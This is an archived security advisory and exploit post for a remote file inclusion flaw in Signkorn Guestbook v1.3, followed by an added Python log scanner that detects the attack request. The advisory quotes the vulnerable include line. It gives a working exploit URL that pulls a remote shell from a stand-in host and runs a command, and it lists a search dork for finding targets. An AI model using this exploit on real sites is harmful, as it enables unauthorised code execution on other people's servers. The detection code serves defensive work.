securityvulns SECURITYVULNS:DOC:14255
Sep 13, 2006 - 12:00 a.m.

Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit

#==============================================================================================
#Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Vendor site : http://warez.gtasoft.ru/skripts/SignKorn.Guestbook.(SL).v1.1.PHP.NULL-DGT.zip

#Version : v1.3 & all versions below

#================================================================================================

#Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"

#================================================================================================
#Bug in : includes/log.inc.php

#Vuln Code :
#--------------------------------

if ($_SESSION['permission'] == "yes") {

    // ########### Admin Menu

    // $dir_path is not assigned before this include in the excerpt shown
    include($dir_path . '/includes/admin.menu.inc.php');

}

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/includes/log.inc.php?_SESSION[permission]=yes&dir_path=http://SHELLURL.COM?&cmd=id

#================================================================================================
#Discovered By : SHiKaA

#Contact : SHiKaA-[at]hotmail.com

#GreetZ : CCtream - Cyper-worrier team

Special Thx To : Str0ke & simoo

==================================================================================================
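
A log check for the request shape this advisory describes, as an added example that is not part of the original advisory: it flags direct requests to includes/log.inc.php, query parameters that name a PHP superglobal, and a dir_path value that is a URL. The log lines, hosts and function names are constructed for illustration, and treating files under includes/ as never requested directly is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# PHP superglobals that no request parameter should be able to name.
SUPERGLOBALS = {"_SESSION", "_GET", "_POST", "_COOKIE", "_SERVER",
                "_FILES", "_ENV", "_REQUEST", "GLOBALS"}
# A value that is a URL (scheme://...) or protocol-relative (//host/...).
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
# The request line inside a combined-format access log entry.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Sep/2006:10:01:02 +0000] "GET /gb/index.php?page=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [13/Sep/2006:10:03:17 +0000] "GET /gb/includes/log.inc.php'
    '?_SESSION[permission]=yes&dir_path=http://files.example.invalid/a.txt?&cmd=id HTTP/1.1" 200 312',
    '192.0.2.44 - - [13/Sep/2006:10:03:40 +0000] "GET /gb/includes/log.inc.php'
    '?%5FSESSION%5Bpermission%5D=yes&dir_path=%68ttp%3A%2F%2Ffiles.example.invalid%2Fa.txt%3F HTTP/1.1" 200 312',
]


def findings(log_line):
    """Return the reasons a log line matches the request shape in the advisory."""
    match = REQUEST_LINE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    reasons = []
    # Assumption: files under includes/ are meant to be include()d, not requested.
    if unquote(url.path).lower().endswith("/includes/log.inc.php"):
        reasons.append("direct request to include file")
    # parse_qsl percent-decodes names and values, so encoded variants match too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        base = name.split("[", 1)[0]
        if base in SUPERGLOBALS:
            reasons.append("superglobal in query: " + base)
        if base == "dir_path" and REMOTE_VALUE.search(value):
            reasons.append("remote dir_path")
    return reasons


def scan(lines):
    """Return (line_index, reasons) for every line with at least one finding."""
    return [(i, r) for i, line in enumerate(lines) if (r := findings(line))]


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_LOG):
        print(index, ", ".join(reasons))
```
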